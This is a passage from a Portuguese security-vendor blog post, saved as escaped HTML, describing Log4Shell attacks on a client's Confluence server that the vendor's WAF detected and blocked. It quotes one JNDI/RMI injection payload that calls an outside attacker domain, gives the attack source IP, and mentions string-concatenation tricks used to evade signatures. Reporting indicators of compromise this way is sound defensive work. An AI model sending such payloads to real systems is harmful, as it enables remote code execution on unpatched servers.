![\"\"](\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/ataques-confluence-detectados-waf-xlabs.jpg\")
<\/a><\/figure>\n\n\n\n<\/p>\n\n\n\n
O ataque propriamente dito, foi muito bem direcionado, indo em dire\u00e7\u00e3o a uma aplica\u00e7\u00e3o \u201cConfluence\u201d desse nosso cliente, aplica\u00e7\u00e3o mantida pelo desenvolvedor Atlassian. <\/p>\n\n\n\n
Passados alguns dias a pr\u00f3pria Atlassian, no dia 21 de dezembro de 2021, confirmou que plataformas \u201cConfluence\u201d estariam vulner\u00e1veis a execu\u00e7\u00e3o de comandos remotamente atrav\u00e9s da falha Log4Shell, o que nos levou a crer que o cliente em quest\u00e3o estaria na mira de algum grupo avan\u00e7ado de amea\u00e7as persistentes, provavelmente patrocinados pelo estado chin\u00eas, devido a import\u00e2ncia e o tamanho do \u201calvo\u201d, al\u00e9m das quest\u00f5es, localiza\u00e7\u00e3o da origem do ataque, a informa\u00e7\u00e3o \u201cprivilegiada\u201d antes mesmo do desenvolvedor confirmar a exist\u00eancia da falha nas plataformas \u201cConfluence\u201d.<\/p>\n\n\n\n
O IP de origem do ataque foi 114.254.20.186 de Beijing, China, e teve padr\u00f5es de inje\u00e7\u00f5es RMI, outro padr\u00e3o de verifica\u00e7\u00e3o da falha diferente da explora\u00e7\u00e3o por LDAP, o Payload utilizado foram varia\u00e7\u00f5es do tipo: \u201c${jndi:rmi:\/\/XXXX.l.i.yunzhanghu.co:443\/abc}\u201d utilizando-se do dom\u00ednio \u201cyunzhanghu.co\u201d, dom\u00ednio registrado em 15 de Junho de 2020, e muito pouco conhecido por atividades maliciosas na internet, outra raz\u00e3o ao qual desconfiamos de um ataque muito bem direcionado, informa\u00e7\u00f5es estas obtidas atrav\u00e9s de consultas a plataformas de IOC\u2019s, como V\u00edrus Total, Cisco Umbrella e demais outras plataformas que possu\u00edmos acessos para rastreios de atividades ilegais na internet.<\/p>\n\n\n\n
Ainda sobre a falha do Log4J, ao monitorarmos as atividades contra outros clientes, identificamos muitas varia\u00e7\u00f5es da explora\u00e7\u00e3o da vulnerabilidade, atacantes concatenando strings para formar a palavra JNDI, ou LDAP, que foram as primeiras palavras adicionadas em mecanismos de defesa como principais assinaturas dos ataques.<\/p>\n\n\n\n
Para deixar nossos clientes mais tranquilos, informamos que para as explora\u00e7\u00f5es mesmo em situa\u00e7\u00f5es como esta de um \u201c0day\u201d, durante o 09 de dezembro de 2021, no dia da divulga\u00e7\u00e3o da falha, identificamos e mitigamos explora\u00e7\u00f5es sem ao menos lan\u00e7armos assinaturas para a detec\u00e7\u00e3o da falha, pois nosso WAF<\/a> identifica os padr\u00f5es fora do normal de uma requisi\u00e7\u00e3o HTTP, e as requisi\u00e7\u00f5es da explora\u00e7\u00e3o do Log4Shell s\u00e3o enquadradas neste tipo, uma requisi\u00e7\u00e3o fora do padr\u00e3o HTTP.<\/p>\n\n\n\n Para sermos ainda mais assertivos, no dia 10 de dezembro, come\u00e7amos os estudos para a manufatura de uma assinatura para a mitiga\u00e7\u00e3o da falha e tamb\u00e9m para as suas varia\u00e7\u00f5es e tentativas de ByPass, no mesmo dia j\u00e1 lan\u00e7amos as respectivas assinaturas. Nos dias seguintes \u00e0 divulga\u00e7\u00e3o do patch da falha, surgiram outras fragilidades no Log4J que at\u00e9 mesmo podem ocasionar a paralisa\u00e7\u00e3o de sistemas atrav\u00e9s de um \u201cDoS\u201d.<\/p>\n\n\n\n No dia 20 de dezembro, ap\u00f3s termos uma base de dados bem s\u00f3lida dos ataques, passamos para a quest\u00e3o cognitiva do nosso WAF<\/a>, ensinando nossa intelig\u00eancia a reagir perante a identifica\u00e7\u00e3o dos ataques, ao qual nosso WAF identificando e barrando a requisi\u00e7\u00e3o maliciosa, j\u00e1 estabelece bloqueios din\u00e2micos \u00e0s origens desses ataques.<\/p>\n\n\n\n Ainda durante o dia 20 de dezembro, conclu\u00edmos a aplica\u00e7\u00e3o de melhorias do nosso WAF e nossa Intelig\u00eancia, aplicando diversas melhorias na plataforma, incluindo a distribui\u00e7\u00e3o de blacklists din\u00e2micas entre os pr\u00f3prios WAF\u2019s, melhorando a quest\u00e3o da performance no bloqueios de ataques, dos mais variados tipos que nossa intelig\u00eancia identifica.<\/p>\n\n\n\n Essas modifica\u00e7\u00f5es s\u00e3o t\u00e3o importantes que decidimos trazer num post futuro em nosso blog. Obviamente, nossos sistemas passam por cont\u00ednuos aprimoramentos, desenvolvidos e testados durante o m\u00eas corrente e aplicados gradativamente em nossa plataforma durante as primeiras semanas do m\u00eas subsequente. <\/p>\n\n\n\n No gr\u00e1fico abaixo, podemos perceber a quantidade de requisi\u00e7\u00f5es chegando a nossos clientes nos dias que seguiram a divulga\u00e7\u00e3o da falha, e logo ap\u00f3s o dia 20 de dezembro, as requisi\u00e7\u00f5es come\u00e7aram a reduzir e serem suprimidas pelo nosso sistema de intelig\u00eancia juntamente com essas novas melhorias que implementamos.<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n Provavelmente voc\u00ea se perguntou tamb\u00e9m se nossos sistemas poderiam ou n\u00e3o ser afetados por esta falha, que por sinal ainda existem muitas outras aplica\u00e7\u00f5es a serem mapeadas para sabermos a exist\u00eancia ou n\u00e3o da falha \u201cembarcada\u201d em tais sistemas.<\/p>\n\n\n\n A resposta para este questionamento \u00e9, depende. Estamos ainda avaliando a estrutura de softwares que possu\u00edmos em nossos ambientes, uma informa\u00e7\u00e3o importante a ser levada a nossos clientes e investidores \u00e9 que nossos ambientes expostos a internet, passaram por um rigoroso processo de verifica\u00e7\u00e3o, e at\u00e9 o momento n\u00e3o identificamos sistemas nossos vulner\u00e1veis a esta falha. <\/p>\n\n\n\n Avaliamos tamb\u00e9m nossa plataforma de WAF para a identifica\u00e7\u00e3o de poss\u00edveis falhas em plugins e\/ou em aplica\u00e7\u00f5es que podemos utilizar internamente para monitoramento de nossos servidores, e at\u00e9 o momento n\u00e3o foram constatadas aplica\u00e7\u00f5es vulner\u00e1veis internamente em nossos WAF\u2019s.<\/p>\n\n\n\n Obviamente, nossos WAF\u2019s j\u00e1 possuem a parte web deles protegida por eles pr\u00f3prios, inclusive identificamos diversos ataques contra nossas pr\u00f3prias plataformas de WAF\u2019s envolvendo a falha Log4Shell, mas todos mitigados e barrados por nosso WAF. Por\u00e9m, n\u00e3o podemos nos basear 100% na prote\u00e7\u00e3o do WAF, mesmo assim, analisamos nossas aplica\u00e7\u00f5es e sistemas internos na busca de poss\u00edveis brechas.<\/p>\n\n\n\n Continuamos monitorando a situa\u00e7\u00e3o e a lista de aplica\u00e7\u00f5es afetadas pela falha, al\u00e9m de estarmos lado a lado com nossos clientes para uma melhor an\u00e1lise e forma de mitiga\u00e7\u00e3o dos riscos que essa e outras falhas podem ocasionar.<\/p>\n\n\n\n Confira abaixo um resumo dos principais acontecimentos desde a divulga\u00e7\u00e3o da falha.<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n Refer\u00eancias:<\/p>\n\n\n\n https:\/\/github.com\/NCSC-NL\/log4shell<\/a><\/p>\n\n\n\n https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b<\/a><\/p>\n\n\n\n https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b<\/a><\/p>\n\n\n\n https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228<\/a><\/p>\n\n\n\n https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45105<\/a><\/p>\n\n\n\n https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046<\/a><\/p>\n\n\n\n<\/a><\/figure>\n\n\n\nMas, e os sistemas da XLabs Security? Est\u00e3o protegidos contra o Log4Shell?<\/strong><\/h3>\n\n\n\n
<\/a><\/figure>\n\n\n\n